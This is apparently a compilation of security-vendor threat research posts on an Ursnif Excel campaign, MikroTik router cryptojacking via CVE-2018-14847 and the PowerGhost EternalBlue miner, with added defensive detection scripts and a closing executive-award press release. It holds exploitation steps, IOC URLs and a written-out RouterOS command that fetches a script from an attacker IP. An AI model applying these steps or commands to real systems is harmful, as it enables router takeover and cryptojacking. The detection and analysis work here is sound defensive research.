Italy is targeted again by Ursnif delivered via malicious Microsoft Excel Documents

SonicWall RTDMI engine detected multiple targeted attacks using Microsoft Excel documents directed towards Italy. Similar attacks were observed a month back as well. Information about these fresh attacks was not available in any of the popular threat intelligence sharing portals such as VirusTotal and ReversingLabs.

Fig-1 : Virustotal results for the malicious file

Upon closer analysis of one of the detected samples, we found it to be using a malicious macro which downloads the payload only if the victim happens to be from a particular geographical area (Italy in this case). The payload malware is not downloaded directly, to avoid detection; the download happens in multiple stages. In the first stage, the VBA macro code executes a command present in a cell of the Excel spreadsheet. This cell containing the code has a very small visible size to hide it from the user. We are observing this new evasion mechanism being used in recent malicious Office documents, where the actual malicious elements are part of the sheet data and not of the VBA macro code.

Fig-2 : command inside a cell in excel
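The cell-hiding trick above can be checked for statically, without opening the workbook in Excel. The following is an added example (not SonicWall's code) that parses the worksheet XML inside an .xlsx and flags inline-string cells that look like commands, noting whether the cell sits in a hidden or sub-character-width column or row. The sample sheet XML and the command markers are constructed for this example; real documents usually keep text in sharedStrings.xml, which this example does not resolve.

```python
import re
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}
# Heuristic markers of a cell holding a command rather than data (assumed, not from the page).
CMD_RE = re.compile(r"(powershell|cmd(\.exe)?\b|wscript|mshta|rundll32|https?://)", re.I)

# Constructed xl/worksheets/sheet1.xml mimicking a command placed in a column 0.1 characters wide.
SAMPLE_SHEET_XML = """<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <cols><col min="2" max="2" width="0.1" customWidth="1"/></cols>
  <sheetData>
    <row r="1"><c r="A1" t="inlineStr"><is><t>Invoice</t></is></c></row>
    <row r="2"><c r="B2" t="inlineStr"><is><t>powershell -NoP -W Hidden -EncodedCommand PLACEHOLDER</t></is></c></row>
    <row r="3"><c r="A3" t="inlineStr"><is><t>See https://example.invalid/terms</t></is></c></row>
  </sheetData>
</worksheet>"""

def col_index(cell_ref):
    """'B2' -> 2 (1-based column number)."""
    n = 0
    for ch in re.match(r"[A-Z]+", cell_ref).group(0):
        n = n * 26 + ord(ch) - 64
    return n

def concealed_columns(root):
    """Column numbers declared hidden or narrower than one character."""
    cols = set()
    for col in root.findall("m:cols/m:col", NS):
        if col.get("hidden") == "1" or float(col.get("width", "8.43")) < 1.0:
            cols.update(range(int(col.get("min")), int(col.get("max")) + 1))
    return cols

def scan_sheet_xml(xml_text):
    """Return [(cell, concealed, text)] for inline-string cells that look like commands."""
    root = ET.fromstring(xml_text)
    hidden_cols = concealed_columns(root)
    hits = []
    for row in root.findall("m:sheetData/m:row", NS):
        # A row is effectively invisible when hidden or shorter than one point.
        row_hidden = row.get("hidden") == "1" or float(row.get("ht", "15")) < 1.0
        for c in row.findall("m:c", NS):
            text = "".join(t.text or "" for t in c.findall(".//m:t", NS))
            if CMD_RE.search(text):
                concealed = row_hidden or col_index(c.get("r")) in hidden_cols
                hits.append((c.get("r"), concealed, text))
    return hits
```

To run it over a real file, open the .xlsx with zipfile and pass each xl/worksheets/sheet*.xml entry to scan_sheet_xml.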

In the second stage, the code in the hidden cell downloads an encrypted PowerShell script. The downloaded script is then decrypted using the hard-coded key shown in Fig-2. The image below shows both the encrypted and decrypted versions of the PowerShell script.

Fig-3 : Encrypted and decrypted script

This second stage in turn downloads another PowerShell script, which is used to identify the victim's geographical location as shown below:

Fig-4 : script finding Geo-location of user

The payload, which at the time of analysis belongs to the Ursnif family, is delivered only if the victim is from the specific geographical area.

Indicators of Compromise (IOC):

  • 090bf9ac357837fa7b1085fd79e21d613ebf58aaa3cf54a86711f66d267b12c3 : Malicious Excel File
  • hxxps://pag[xxx]nto.us/abcd
  • hxxps://pag[xxx]nto.us/abc
  • hxxps://pag[xxx]nto.us/realte.xlsx
  • e1e1ec90f643619c1001504897e7b00ed0906d102d8730975b9d0db1a87ec5c1 : Ursnif Malware

Hashes of similar malicious excel files:

  • 150564c5252c417c093814e7b965d327d342098bc80d4c64667df143703ed274
  • e43c3adfe2b117abbabc735e2bfe1d95b2fcac86d4b3aecffbbc6d793942f044
  • 96cede3e965bec5d4d6a558ddd01256ea160cb98ebfa6d4f431f46117c975496

Capture ATP report for this file:

Massive Cryptojacking campaign compromised ~200,000 MikroTik routers

SonicWall is observing a massive cryptojacking malware campaign that is spreading aggressively throughout Brazil. The malware attempts to exploit the vulnerability CVE-2018-14847 by targeting unpatched versions of MikroTik RouterOS. Compromised MikroTik routers have been made to inject the Coinhive miner script into the web pages they host and also into pages served through their web proxy. As MikroTik routers are mainly used by Internet Service Providers (ISPs), the impact is huge and widespread.

Fig:1 Monero mining through compromised MikroTik RouterOS

CVE-2018-14847:

Winbox, a utility for administration of MikroTik RouterOS, allows remote attackers to bypass authentication and read arbitrary files. Winbox accepts socket connections on port 8291 and, in case of error, sends a “Bad Session id” response. Along with this response, one byte of the Session ID is also sent. Attackers could exploit this exposure of the session ID to craft a request to get into the system. MikroTik RouterOS versions 6.29 through 6.42 are vulnerable to this attack.

Steps to exploit this vulnerability:

1. Scan for MikroTik devices by sending a UDP broadcast message to port 5678 and figure out the MAC address from the socket connection message.

Note: UDP port 5678 is used for MikroTik Neighbor Discovery Protocol (MNDP).

Fig: 2 Discovering MikroTik devices from POC

2. Attempt to connect to the MikroTik device with its MAC. Capture the Session ID leaked by the “Bad session id” response. Resend the packet, altering just one byte of the session ID, to bypass authentication, allowing access to files.

Fig 3 : Exploit code from POC

3. Extract the data files and user credentials to get admin privileges over the MikroTik device.

4. Make the below changes to the MikroTik router, leaving the device more vulnerable than before.

  • Disable drop rules for the firewall
  • Enable port 4145 for IP SOCKS
  • Add a system scheduler entry to run a script named script3_ every 30s to fetch the updated mikrotik.php:
    • fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http

We also observed unusual port activity for destination port 4145. The spike in port scans shown below aligns with the time period of this attack, but the IP address that was tapped is not the same as 95.154.216.*

Fig: 4 NetworkScan monitor report from netlab 360

Inject Coinhive Miner script:

MikroTik can be used as a web server hosting web pages and as a proxy server proxying HTTP requests, caching the responses for later use; it also provides custom error pages. Attackers have used all three avenues to spread the injection of the Coinhive miner widely. Users connected to MikroTik RouterOS can have the script injected into their responses, as can users visiting the pages hosted by MikroTik (shown in Fig 1). It spread quickly to ~200,000 web hosts carrying the Coinhive miner script linked with a single Coinhive ‘SiteKey’ that belongs to the attacker.

Fig: 5 Coinhive miner script injected into a website


Fig: 6 Volume of web hosts impacted with this

Coinhive:

Cryptojacking is the secret use of your computing device to mine cryptocurrency. In-browser cryptojacking secretly uses the computing device of the site visitor to mine bits of cryptocurrency. Coinhive is a cryptocurrency mining service that offers a JavaScript miner API for the Monero blockchain. It can be embedded in any website, but website owners abuse this service by not asking for users' permission to run the miner. Attackers also abuse it by embedding the Coinhive API with their own sitekey on hacked websites. Users visiting those sites run the miner in their browsers, draining their CPU power as long as the browser is open. Unlike Bitcoin, Monero is untraceable and there is no way to track Monero transactions. This makes Monero an ideal candidate for hackers and Coinhive the most prevalent malware to mine cryptocurrency. With cryptojacking, all the infected machines work to mine cryptocurrency, which is more profitable than ransomware.
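Because the injected pages in this campaign all load the miner with one attacker-owned SiteKey, the key is a useful pivot for a defender scanning hosted or proxied pages. The following added example (not SonicWall's code) extracts Coinhive loader URLs and SiteKeys from HTML bodies and groups hosts by key; the HTML and the SiteKey value are constructed for the example.

```python
import re

# Constructed HTML resembling a page with the miner loader injected; not a real capture.
SAMPLE_HTML = """<html><head><title>Example ISP portal</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('CONSTRUCTED_SITEKEY_0123456789abcdef', {throttle: 0.2});
  miner.start();
</script>
</head><body><p>Welcome</p></body></html>"""

# A <script src=...> whose URL mentions coinhive, and the first argument of the miner constructor.
LOADER_RE = re.compile(r'<script[^>]+src=["\']([^"\']*coinhive[^"\']*)["\']', re.I)
SITEKEY_RE = re.compile(r'CoinHive\.(?:Anonymous|User)\s*\(\s*["\'](\w+)["\']', re.I)

def scan_html(html):
    """Return loader URLs and site keys found in one HTML body, or None when nothing matches."""
    loaders = LOADER_RE.findall(html)
    sitekeys = SITEKEY_RE.findall(html)
    if not loaders and not sitekeys:
        return None
    return {"loaders": loaders, "sitekeys": sitekeys}

def group_by_sitekey(scans):
    """Map each site key to the set of hosts serving it, given {host: scan_html result}.
    Many hosts sharing one key is the signature of a single injection campaign."""
    by_key = {}
    for host, result in scans.items():
        if not result:
            continue
        for key in result["sitekeys"]:
            by_key.setdefault(key, set()).add(host)
    return by_key
```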

Sonicwall Threat Research Lab provides protection against Coinhive miner with the following signatures:

  • GAV Coinhive.JS_2
  • GAV CoinHive.JS
  • SPY CoinHive WebAssembly Binary 1
  • IPS Coinhive Monero Miner Secure Web Traffic 1
  • IPS Coinhive Monero Miner Secure Web Traffic 2
  • IPS Coinhive Monero Miner Web Traffic 1

Trend Graph & Geostatistics :

Find below the hits that SonicWall observed in the recent past

This attack can be avoided by updating to the latest version of MikroTik RouterOS and securing the router with strong authentication and firewall rules to block unauthorized access.
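The configuration changes listed in step 4 above (disabled firewall drop rules, SOCKS enabled on 4145, a 30-second scheduler fetching mikrotik.php) are also what an operator should look for when auditing an existing router. The following added example (not SonicWall's or MikroTik's code) parses the text of a RouterOS export and reports those indicators; the export fragment is constructed for the example, with the address, port and script name taken from this page.

```python
import re

# Constructed fragment of RouterOS "/export" output containing the post-compromise changes.
SAMPLE_EXPORT = """
/ip socks
set enabled=yes port=4145
/ip firewall filter
add action=drop chain=input comment="drop all else" disabled=yes
add action=accept chain=input connection-state=established,related
/system scheduler
add interval=30s name=script3_ on-event="/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http" policy=read,write,policy,test start-time=startup
"""

def parse_export(text):
    """Return {section path: [command line, ...]} from a RouterOS export."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("/"):          # section header such as "/ip socks"
            current = line
            sections.setdefault(current, [])
        elif current:
            sections[current].append(line)
    return sections

def audit_export(text):
    """List the indicators described in the article that are present in the export."""
    sec = parse_export(text)
    findings = []
    for line in sec.get("/ip socks", []):
        if "enabled=yes" in line:
            port = re.search(r"port=(\d+)", line)
            findings.append("SOCKS proxy enabled on port " + (port.group(1) if port else "?"))
    for line in sec.get("/ip firewall filter", []):
        if "action=drop" in line and "disabled=yes" in line:
            findings.append("firewall drop rule disabled: " + line)
    for line in sec.get("/system scheduler", []):
        m = re.search(r'interval=(\S+).*on-event="([^"]*)"', line)
        if m and "fetch" in m.group(2):
            findings.append("scheduler fetches remote script every %s: %s" % (m.group(1), m.group(2)))
    return findings
```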

PowerGhost – A stealthy miner with Eternal Blue component for spreading further

SonicWall Capture Labs Threat Research team has been observing a stealthy cryptominer for the past several weeks that is spreading via PowerShell scripts. By using obfuscated PowerShell and not creating new files on the system, this miner stays hidden and out of sight of the unsuspecting user, and spreads to other machines using the EternalBlue exploit. Owing to this silent behavior it has been named PowerGhost.

We obtained a few components of this miner corresponding to different stages of its life-cycle:


Stage I: Infected web-page

The infection vector of this malware appears to be malicious web pages. We obtained a PHP web page that contains a Base64-obfuscated script containing a download link for the next stage:

This is a potent way to spread infection, as such web pages can easily spread via email or when a user visits a website hosting the malicious page. We observed the following IPs hosting the next stage during our analysis:

  • hxxp://185.128.43.62/eop.ps1
  • hxxp://192.74.245.97/eop.ps1

Stage II: The first PowerShell script

This obfuscated Powershell script has two objectives:

  1. Disable Windows Defender on the infected machine
  2. Identify the architecture of the machine and download the appropriate script for the next stage

The following image shows the obfuscated PowerShell script and the code obtained after de-obfuscation:

Windows Defender disabling component:

We found 4 hard-coded domains where the next stage of the attack is hosted:

  • update.7h4uk.com
  • info.7h4uk.com
  • 185.128.43.62
  • 192.74.245.97

Based on the architecture of the system, the appropriate script is downloaded as shown:

The following are downloaded and run as per the system architecture:

  • http://[one of the above mentioned domains]/antivirus.ps1
  • http://[one of the above mentioned domains]/antitrojan.ps1

Stage III: The second PowerShell script

This script contains multiple components that are Base64 encoded. These components are collectively needed to get the infected system to start mining:
1. $miiiiii is the miner executable ( detected as )

2. $mmmmmmm is mimikatz (detected as ), a post exploitation tool that can be used to exploit Windows credentials to gain control over the infected machine:

3. $crrrrrrr and $cppppppp are MSVCR120.dll and MSVCP120.dll respectively:

4. $fffffff contains Base64-encoded code to reflectively load mimikatz in memory without writing the binary to disk, thereby adding to its stealthy nature:

This PowerShell script contains another layer of obfuscated script:
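When triaging a Stage III script of this kind, the first job is to pull out each Base64 variable and work out what it decodes to (a PE such as the miner, mimikatz or the runtime DLLs, versus more script). The following added example (not SonicWall's code) does that over a constructed PowerShell fragment; the variable names follow the article, but the encoded blobs are tiny stand-ins, not the real binaries.

```python
import base64
import re

# Constructed PowerShell fragment in the style of the Stage III script: each variable holds a
# Base64 blob. The blobs are placeholders: two minimal "MZ"-headed buffers and a short script.
SAMPLE_PS1 = r'''
$miiiiii = "{}"
$crrrrrrr = "{}"
$fffffff = "{}"
'''.format(
    base64.b64encode(b"MZ" + b"\x90" * 62 + b"PE\0\0").decode(),
    base64.b64encode(b"MZ" + b"\x00" * 30).decode(),
    base64.b64encode(b"function Invoke-ReflectivePE { param($bytes) }").decode(),
)

# $name = "<base64>"  with at least 16 Base64 characters, to skip ordinary short strings.
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*["\']([A-Za-z0-9+/=]{16,})["\']')

def classify(blob):
    """Guess what a decoded blob is from its leading bytes."""
    if blob[:2] == b"MZ":
        return "pe"            # DOS/PE header: an executable or DLL
    try:
        blob.decode("ascii")
        return "script"        # printable text, most likely more PowerShell
    except UnicodeDecodeError:
        return "binary"

def extract_components(script_text):
    """Return {variable: (kind, decoded size in bytes)} for every Base64 string assignment."""
    found = {}
    for name, b64 in ASSIGN_RE.findall(script_text):
        try:
            blob = base64.b64decode(b64, validate=True)
        except ValueError:     # binascii.Error is a ValueError subclass
            continue
        found[name] = (classify(blob), len(blob))
    return found
```

On a real sample the decoded blobs would be written out for hashing and scanning rather than just classified.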

Stage IV: Attack and spread

This second layer of the obfuscated script contains some interesting and potentially dangerous components:
1. Function Download File – downloads a file onto the infected system, which can be used to install additional malicious components/executables
2. Function Get-creds – extracts the victim's logon credentials
3. Function RunDDOS – capability to launch DDoS attacks
4. The threat seems interested in machines in the private address range, as it has a number of functions for this purpose:

5. The function eb7($target, $shellcode) contains a number of suspicious components that exploit the vulnerability CVE-2017-0144, the infamous EternalBlue exploit:

SMB_COM_NT_TRANSACT contains a TRANS2_OPEN2 Transaction sub-command that has a maliciously large SizeOfListInBytes value which exploits the vulnerability CVE-2017-0144. Successful exploitation can result in arbitrary code execution with system privileges in kernel mode or cause the system to crash resulting in a denial-of-service condition.

Stealth is an important aspect of this threat, as it operates without dropping or creating files on the infected machine for most of its life-cycle. These stealth attributes, coupled with its ability to find new targets laterally and its EternalBlue exploit components, make this an extremely dangerous threat in a corporate environment, where it can harvest computing power for mining.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: PowerShell.Gen (Exploit)
  • GAV: Mimikatz.PG (HackTool)
  • GAV: PowerGhost.FOB (Trojan)
  • GAV: PowerGhost.EOS (Trojan)
  • GAV: XMRig.XMR_3 (Trojan)
  • IPS 12814: Windows SMB Remote Code Execution (MS17-010) 5
  • IPS 12794: Windows SMB Remote Code Execution (MS17-010) 3

The images below show the heat map for XMRig.XMR_3 and the corresponding hits graph. As visible below, we saw a hit spike for this signature at the end of July:

SonicWall’s Bill Conner, Steve Pataky Honored in CRN Top 100 Executives List for 2018

SonicWall CEO Bill Conner and Chief Revenue Officer Steve Pataky have each been named to CRN’s exclusive Top 100 Executives list for 2018.

Conner, who has held the top post at SonicWall since November 2016, is honored by CRN as one of the year’s most influential executives. Complementing that achievement, Pataky was dubbed one of the country’s elite channel sales leaders.

“Visionary and strategic leadership can make the difference between just surviving and actually excelling in this period of disruptive change for the IT channel,” said Bob Skelley, CEO, The Channel Company. “In order for technology suppliers and solution providers to thrive and stay ahead of the competition, they need leaders who are able to envision both the future of the channel and the role their organization needs to play in order to create that reality. CRN’s 2018 Top 100 Executives embody these qualities. They are change agents who deliver unwavering guidance to their companies, always asking where are we headed and not being afraid to take the necessary steps to get there.”

CRN’s annual Top 100 Executives list singles out the IT channel’s most effective CEOs — leaders who play an integral role in shaping the industry, whether by driving huge cultural shifts or forging innovative new routes to success.

This annual list recognizes leaders from the technology industry who have played an integral role in shaping today’s IT channel, whether by driving huge cultural shifts, creating rich new opportunities, or forging innovative routes to success.

Conner is among the most experienced security, data and infrastructure executives worldwide, with a career spanning over 30 years across numerous high-tech industries. A corporate turn-around expert, he’s re-engineered product lines, built world-class service organizations, re-aligned global sales organizations and created industry-leading marketing campaigns, and brokered multi-million dollar mergers, sales and acquisitions.

Conner also is a staunch supporter of public-private partnerships on cyber security, and is regularly called on to share his expertise with global leaders at major financial institutions, enterprises and governments.

Pataky is a sales and channel professional with over 25 years of experience architecting and executing global go-to-market strategies for networking and security technologies. A persistent channel advocate, Pataky builds innovative global programs and partner development strategies at scale to generate leverage and partner profitability.

Pataky has been recognized with CRN’s prestigious Channel Chiefs award for several years, including the 50 Most Influential Channel Chiefs in 2014, 2015, 2017 and 2018.